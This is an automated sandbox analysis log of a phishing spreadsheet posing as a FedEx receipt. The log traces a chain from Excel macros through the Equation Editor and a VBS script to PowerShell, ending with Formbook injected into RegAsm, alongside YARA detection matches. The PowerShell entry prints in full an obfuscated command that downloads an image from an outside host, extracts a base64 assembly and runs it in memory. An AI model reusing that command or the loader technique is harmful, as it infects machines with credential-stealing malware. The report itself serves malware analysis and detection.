            Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: FedEx Receipt_53065724643.xlsOLE: Microsoft Excel 2007+
            Source: FedEx Receipt_53065724643.xlsOLE: Microsoft Excel 2007+
            Source: ~DFE1D622D06AD63FEF.TMP.0.drOLE: Microsoft Excel 2007+
            Source: ~DF5C7C8EE0310B7690.TMP.0.drOLE: Microsoft Excel 2007+
            Source: B9930000.0.drOLE: Microsoft Excel 2007+
            Source: B9930000.0.drOLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BrlcB.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ilang.in.urlJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042B243 NtClose,12_2_0042B243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk,12_2_023907AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,12_2_0238FAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,12_2_0238FB68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238F9F0 NtClose,LdrInitializeThunk,12_2_0238F9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,12_2_0238FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02390078 NtResumeThread,12_2_02390078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02390060 NtQuerySection,12_2_02390060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02390048 NtProtectVirtualMemory,12_2_02390048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023900C4 NtCreateFile,12_2_023900C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0239010C NtOpenDirectoryObject,12_2_0239010C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023901D4 NtSetValueKey,12_2_023901D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02390C40 NtGetContextThread,12_2_02390C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023910D0 NtOpenProcessToken,12_2_023910D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02391148 NtOpenThread,12_2_02391148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FA20 NtQueryInformationFile,12_2_0238FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FA50 NtEnumerateValueKey,12_2_0238FA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FAB8 NtQueryValueKey,12_2_0238FAB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FAD0 NtAllocateVirtualMemory,12_2_0238FAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FB50 NtCreateKey,12_2_0238FB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FBB8 NtQueryInformationToken,12_2_0238FBB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FBE8 NtQueryVirtualMemory,12_2_0238FBE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238F8CC NtWaitForSingleObject,12_2_0238F8CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238F938 NtWriteFile,12_2_0238F938
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02391930 NtSetContextThread,12_2_02391930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238F900 NtReadFile,12_2_0238F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FE24 NtWriteVirtualMemory,12_2_0238FE24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FEA0 NtReadVirtualMemory,12_2_0238FEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FED0 NtAdjustPrivilegesToken,12_2_0238FED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FF34 NtQueueApcThread,12_2_0238FF34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FFB4 NtCreateSection,12_2_0238FFB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FFFC NtCreateProcessEx,12_2_0238FFFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FC30 NtOpenProcess,12_2_0238FC30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FC60 NtMapViewOfSection,12_2_0238FC60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FC48 NtSetInformationFile,12_2_0238FC48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FC90 NtUnmapViewOfSection,12_2_0238FC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FD5C NtEnumerateKey,12_2_0238FD5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0238FD8C NtDelayExecution,12_2_0238FD8C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02391D80 NtSuspendThread,12_2_02391D80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041681F12_2_0041681F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041682312_2_00416823
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040318012_2_00403180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004101A312_2_004101A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040E22312_2_0040E223
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00402C7012_2_00402C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00401C2312_2_00401C23
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00401C3012_2_00401C30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040250012_2_00402500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D66312_2_0042D663
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040FF7A12_2_0040FF7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040FF8312_2_0040FF83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040278D12_2_0040278D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040279012_2_00402790
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0239E2E912_2_0239E2E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A230512_2_023A2305
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023EA37B12_2_023EA37B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023C63DB12_2_023C63DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_024463BF12_2_024463BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0239E0C612_2_0239E0C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023EA63412_2_023EA634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0244262212_2_02442622
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A468012_2_023A4680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023AE6C112_2_023AE6C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023AC7BC12_2_023AC7BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242443E12_2_0242443E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023E654012_2_023E6540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_024205E312_2_024205E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023BC5F012_2_023BC5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02426BCB12_2_02426BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0244CBA412_2_0244CBA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023C286D12_2_023C286D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023AC85C12_2_023AC85C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023EC92012_2_023EC920
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A29B212_2_023A29B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_024349F512_2_024349F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023B69FE12_2_023B69FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0244098E12_2_0244098E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023D2E2F12_2_023D2E2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023BEE4C12_2_023BEE4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023B0F3F12_2_023B0F3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02412FDC12_2_02412FDC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0243CFB112_2_0243CFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242AC5E12_2_0242AC5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02442C9C12_2_02442C9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023D0D3B12_2_023D0D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023ACD5B12_2_023ACD5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0244123812_2_02441238
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A735312_2_023A7353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0239F3CF12_2_0239F3CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0241D06D12_2_0241D06D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023CD00512_2_023CD005
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023B905A12_2_023B905A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A304012_2_023A3040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242D13F12_2_0242D13F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0243771D12_2_0243771D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242579A12_2_0242579A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023D57C312_2_023D57C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023DD47D12_2_023DD47D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023B148912_2_023B1489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023D548512_2_023D5485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A351F12_2_023A351F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_024435DA12_2_024435DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02453A8312_2_02453A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023C7B0012_2_023C7B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242DBDA12_2_0242DBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0239FBD712_2_0239FBD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0241F8C412_2_0241F8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0243F8EE12_2_0243F8EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242394B12_2_0242394B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242595512_2_02425955
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023CDF7C12_2_023CDF7C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0242BF1412_2_0242BF14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0243FDDD12_2_0243FDDD
            Source: FedEx Receipt_53065724643.xlsOLE indicator, VBA macros: true
            Source: FedEx Receipt_53065724643.xlsStream path 'MBD00023D36/\x1Ole' : http://ilang.in/BrlcBqA?IO15WZTK0N3T~JY?{q.q^HoV-Q|~Hus:s9Mqf~! k,!Z2X0bL1G9lUmbGuDxB7Jknx6ld8yukv9gO2F4wq2dpLfgSZkjmdSe3mNwyo5hlDmOqb8qNiZOkn1sSec7bIIzBKjmwZIjBbFTsaup1blbV1ZGEYDD9EuRnW4XpZSQkw7SwjLXoXIOtT3j5UX0orbK2JyT8ps\e#Io_Gj]}
            Source: ~DFE1D622D06AD63FEF.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: ~DF5C7C8EE0310B7690.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: ~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0239E2A8 appears 60 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0240F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 023E3F92 appears 132 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 023E373B appears 253 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0239DF5C appears 137 times
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@11/41@9/4
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\I0GD6N06.txtJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8313.tmpJump to behavior
            Source: FedEx Receipt_53065724643.xlsOLE indicator, Workbook stream: true
            Source: B9930000.0.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: FedEx Receipt_53065724643.xlsVirustotal: Detection: 29%
            Source: FedEx Receipt_53065724643.xlsReversingLabs: Detection: 28%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
